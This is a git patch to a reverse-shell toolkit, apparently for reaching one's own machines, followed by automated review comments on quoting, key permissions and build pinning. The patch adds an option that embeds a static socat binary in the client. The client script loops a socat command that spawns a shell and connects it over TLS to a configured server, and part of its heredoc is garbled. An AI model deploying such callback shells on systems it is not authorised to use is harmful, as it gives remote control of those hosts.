From 639e50050702d094a9464cf263995f7f19079eaf Mon Sep 17 00:00:00 2001 From: Mitchell Riedstra Date: Mon, 26 Dec 2022 13:06:48 -0500 Subject: Add an option for embedded socat in the client --- .gitignore | 5 ++--- genclient-embed.sh | 48 ++++++++++++++++++++++++++++++++++++++++++++++++ genclient.sh | 7 +++++-- lib/spawn | 13 ++++++++----- readme.md | 7 +++++++ server.sh | 4 ++-- socat/Dockerfile | 13 +++++++++++++ socat/build.sh | 5 +++++ vars | 4 +++- 9 files changed, 93 insertions(+), 13 deletions(-) create mode 100755 genclient-embed.sh create mode 100644 socat/Dockerfile create mode 100755 socat/build.sh diff --git a/.gitignore b/.gitignore index fa375dd..09239be 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,2 @@ -*.crt -*.key -*.pem +/keys/* +/socat/socat diff --git a/genclient-embed.sh b/genclient-embed.sh new file mode 100755 index 0000000..8c4c144 --- /dev/null +++ b/genclient-embed.sh @@ -0,0 +1,48 @@ +#!/bin/sh + +. ./vars + +help() { +cat < "\$socat" + +chmod +x "\$socat" + +_shell="\$(which zsh mksh bash ksh zsh ash sh 2>/dev/null | sed 1q)" +certificate='$(cat ${basename}.crt)' +crt_tmp="\$(mktemp)" +trap 'rm -f \$crt_tmp \$socat; exit 0' EXIT INT +echo "\$certificate" > "\$crt_tmp" +while [ $loop -ne 0 ] ; do +"\$socat" exec:"\$_shell",pty,stderr,setsid,sigint,sane \\ + "OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp" +sleep $timeout +done + +exit 0 + +__BEGIN_SOCAT__ +EOF + +if [ -e socat/socat ] ; then + gzip -9c < socat/socat | base64 +fi + diff --git a/genclient.sh b/genclient.sh index 9984a8b..6e2cda2 100755 --- a/genclient.sh +++ b/genclient.sh @@ -23,10 +23,13 @@ cat < "\$crt_tmp" while [ $loop -ne 0 ] ; do -socat exec:"\$_shell",pty,stderr,setsid,sigint,sane OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp +socat exec:"\$_shell",pty,stderr,setsid,sigint,sane \\ + "OPENSSL:$hostname:$port,verify=$verify,cafile=\$crt_tmp" sleep $timeout done -rm "\$crt_tmp" + +exit 0 EOF 
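Review bot: Narrowing the ignore rules from `*.crt`/`*.key`/`*.pem` to `/keys/*` makes any key material written outside `keys/` committable, and `server.sh` still builds the bundle with `cat "${basename}.key" "${basename}.crt" > "${basename}.pem"`; unless `basename` in `vars` points under `keys/` (not visible in this diff), the private key and bundle would now show up in `git status` and one careless `git add .` ships them. Keeping the old suffix rules alongside the new directory rule costs nothing: `/keys/*`, `*.key`, `*.pem`.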
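Review bot: The trailing `if [ -e socat/socat ]` at the end of the hunk silently emits a client with nothing after `__BEGIN_SOCAT__` when the static binary has not been built, so the generated script only fails later on the target; fail here instead, e.g. `else printf 'socat/socat missing; run socat/build.sh first\n' >&2; exit 1; fi`. The `trap 'rm -f \$crt_tmp \$socat; exit 0' EXIT INT` turns every exit, including a failure of the embedded socat, into status 0; dropping the `exit 0` from the trap keeps the real status. The lines that decode the payload into `$socat` are garbled in this rendering so I cannot check them, but if the binary is written under `mktemp` a `[ -x "\$socat" ] || exit 1` before the `while` loop would avoid spinning forever on a noexec tmp. The `which zsh mksh bash ksh zsh ash sh` list names zsh twice.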
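Review bot: Removing `rm "\$crt_tmp"` after the loop leaves nothing in this hunk that deletes the certificate temp file; unless a `trap ... EXIT` exists in the heredoc lines above the hunk (the generated script starts before it and that part is garbled here), the CA cert now lingers in the target's tmp after the client exits. The embedded variant added in the same commit uses `trap 'rm -f \$crt_tmp; exit 0' EXIT INT`; the equivalent line right after `crt_tmp="\$(mktemp)"` would keep both generators consistent and also cover the Ctrl-C path that the old trailing `rm` never reached.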
diff --git a/lib/spawn b/lib/spawn index 1d19aa4..1b30c19 100755 --- a/lib/spawn +++ b/lib/spawn @@ -4,16 +4,19 @@ SOCKDIR=$(mktemp -d) SOCKF=${SOCKDIR}/usock +trap 'rm -rf $SOCKDIR' EXIT INT + # Start tmux, if needed -if ! tmux ls | grep -q rshsh; then - tmux new -s rshsh -d +if ! tmux ls | grep -q "$tmux_session"; then + tmux new -s "$tmux_session" -d fi # Create window -tmux new-window -t rshsh "socat UNIX-LISTEN:${SOCKF},umask=0077 file:\$(tty),raw,echo=0" +tmux new-window -t "$tmux_session" \ + "stty raw -echo ; socat file:\$(tty),raw,echo=0 UNIX-LISTEN:${SOCKF},umask=0077" # Wait for socket -while test ! -e ${SOCKF} ; do sleep 1 ; done +while test ! -e "${SOCKF}" ; do sleep 1 ; done # Use socat to ship data between the unix socket and STDIO. -exec socat STDIO UNIX-CONNECT:${SOCKF} +exec socat STDIO "UNIX-CONNECT:${SOCKF}" diff --git a/readme.md b/readme.md index 7312a11..7c266c0 100644 --- a/readme.md +++ b/readme.md @@ -31,6 +31,13 @@ $ ./genclient.sh > /tmp/client.sh And you can `scp` it off to your other boxes or whatever. Even copy and paste works. +## Building static socat + +In the `socat` directory there's a `build.sh` that can be used to build +a statically linked socat binary. + +There's a script `genclient-embed.sh` which can then be used to generate a +client script that has socat embedded. ## Attaching to a connected reverse shell diff --git a/server.sh b/server.sh index 32d7fe0..1e61e42 100755 --- a/server.sh +++ b/server.sh @@ -12,7 +12,7 @@ EOF while [ $# -gt 0 ] ; do case $1 in -p) port="$2"; shift ; shift ;; -k) key="$2"; shift ; shift ;; - *) help ;; + *) help ; exit 1;; esac ; done if ! [ -e "$key" ] ; then @@ -20,4 +20,4 @@ if ! [ -e "$key" ] ; then cat "${basename}.key" "${basename}.crt" > "${basename}.pem" fi -socat OPENSSL-LISTEN:${port},cert=${key},reuseaddr,verify=0,fork EXEC:lib/spawn +socat "OPENSSL-LISTEN:${port},cert=${key},reuseaddr,verify=0,fork" "EXEC:lib/spawn" 
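Review bot: `tmux ls | grep -q "$tmux_session"` is a substring/regex match on the session list, so a session whose name merely contains the configured value, or an empty `$tmux_session` which matches everything, makes the script skip `tmux new`; `tmux has-session -t "=$tmux_session" 2>/dev/null` is the exact and quiet check. `$tmux_session` is not defined within the hunk, and if lines 1–3 of lib/spawn do not source `vars` every tmux call here runs with an empty name. The new `trap 'rm -rf $SOCKDIR' EXIT INT` should quote the expansion, `trap 'rm -rf "$SOCKDIR"' EXIT INT`; harmless with mktemp's default location, but TMPDIR can contain spaces.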
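Review bot: The fallback that assembles `${basename}.pem` from the key and cert (context line in the second hunk) writes the private key with the caller's default umask, which on most systems leaves it world-readable; wrap it as `(umask 077; cat "${basename}.key" "${basename}.crt" > "${basename}.pem")`. The listener is still `verify=0` with `fork`, so anyone who can reach the port gets a window created in the operator's tmux session by `lib/spawn`; that is pre-existing, but a comment on the socat line stating that clients are unauthenticated and the port must be firewalled, or a move to client certificates (`verify=1,cafile=...`) now that the generator already ships a cert to clients, would make the exposure explicit.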
diff --git a/socat/Dockerfile b/socat/Dockerfile
new file mode 100644
index 0000000..1cfd72a
--- /dev/null
+++ b/socat/Dockerfile
@@ -0,0 +1,13 @@
+FROM docker.io/alpine:latest
+ARG SOCAT_VERSION
+
+RUN apk add gcc make alpine-sdk openssl-dev openssl-libs-static
+
+RUN wget http://www.dest-unreach.org/socat/download/socat-$SOCAT_VERSION.tar.gz
+
+RUN tar xfzv socat-$SOCAT_VERSION.tar.gz
+
+WORKDIR /socat-$SOCAT_VERSION
+
+RUN env LDFLAGS=-static ./configure --enable-openssl && make -j$(nproc)
+
diff --git a/socat/build.sh b/socat/build.sh
new file mode 100755
index 0000000..e50e5bf
--- /dev/null
+++ b/socat/build.sh
@@ -0,0 +1,5 @@
+#!/bin/sh
+SOCAT_VERSION=1.7.3.4
+image=socat-builder:latest
+buildah build --build-arg SOCAT_VERSION=$SOCAT_VERSION -t $image .
+podman run --rm -v "$(pwd)":/out/ $image cp -v /socat-$SOCAT_VERSION/socat /out/
diff --git a/vars b/vars
index 03bb7b2..319fbaa 100644
--- a/vars
+++ b/vars
@@ -1,7 +1,9 @@ #!/bin/sh +# What tmux session are we going to use for this? +tmux_session="rshsh" # Server's hostname -hostname="do.rygel.us" +hostname="changeme.example.com" # Do we verify the server certificate? verify=1 # This is used to tell the client script whether it should loop in infinity -- cgit v1.2.3
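Review bot: The source tarball is fetched with `wget http://...` and never checksummed or signature-checked, yet the resulting binary is what `genclient-embed.sh` embeds into every client that later runs on remote hosts, so a tampered download would be shipped everywhere; fetch over HTTPS (if the upstream mirror serves it) and pin the digest through a build argument, as below. `docker.io/alpine:latest` is likewise unpinned, so the statically linked OpenSSL changes from build to build with no record; pinning a tag or digest and printing `sha256sum socat` after the build makes the artifact reproducible. A static build also freezes that OpenSSL into the client, so the binary needs rebuilding on OpenSSL advisories, which is worth a comment on the `configure` line.
```dockerfile
ARG SOCAT_VERSION
ARG SOCAT_SHA256
# … unchanged: apk add …
RUN wget https://www.dest-unreach.org/socat/download/socat-$SOCAT_VERSION.tar.gz \
 && echo "$SOCAT_SHA256  socat-$SOCAT_VERSION.tar.gz" | sha256sum -c -
# … unchanged: tar, WORKDIR, configure && make …
```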
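Review bot: Without `set -eu` a failed `buildah build` does not stop the script, and the following `podman run` then copies the binary out of whatever `socat-builder:latest` image is already present, possibly built from an older `SOCAT_VERSION` than the one declared; add `set -eu` after the shebang. The pinned `1.7.3.4` should be checked against the current upstream release before the static binary is embedded into clients, since it is frozen into them together with its OpenSSL. Quoting `"$image"` and `"$SOCAT_VERSION"` on the two command lines keeps shellcheck clean.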